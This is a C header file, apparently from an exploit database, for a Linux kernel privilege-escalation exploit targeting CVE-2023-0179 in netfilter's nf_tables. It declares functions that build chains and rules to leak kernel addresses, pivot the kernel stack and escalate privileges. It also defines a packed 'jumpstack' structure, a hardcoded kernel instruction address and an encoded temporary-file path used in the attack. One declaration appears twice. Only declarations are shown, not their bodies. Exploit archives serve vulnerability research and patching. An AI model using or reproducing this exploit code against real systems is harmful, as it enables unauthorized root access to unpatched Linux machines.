openkylin-exploit-db/cve/linux-kernel/2023/CVE-2023-0179/exploit.h

#pragma once
#include <stdint.h>
#include <sys/socket.h>
#define TMP_WINDPROBE   0x6e69772f706d742f
#define INSTR_BASE      0xffffffff81c2cfa1

#pragma pack(push,1)
struct jumpstack_t {
    unsigned char init;
    unsigned long rule;
    unsigned long last_rule;
    unsigned long eval;
    unsigned long pivot;
    unsigned char pad[31];
};
#pragma pack(pop)

int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_base_chain_rule_pwn(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_base_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_exploit_chain_rule_leak(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len);
int create_jmp_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq);
int create_final_chain_rule(struct mnl_socket* nl, char* table_name, char* chain_name, uint16_t family, uint64_t* handle, int* seq, uint8_t offset, uint8_t len, unsigned long regs, unsigned long instr);
int pwn(struct mnl_socket* nl, unsigned long regs, unsigned long instr);
int privesc();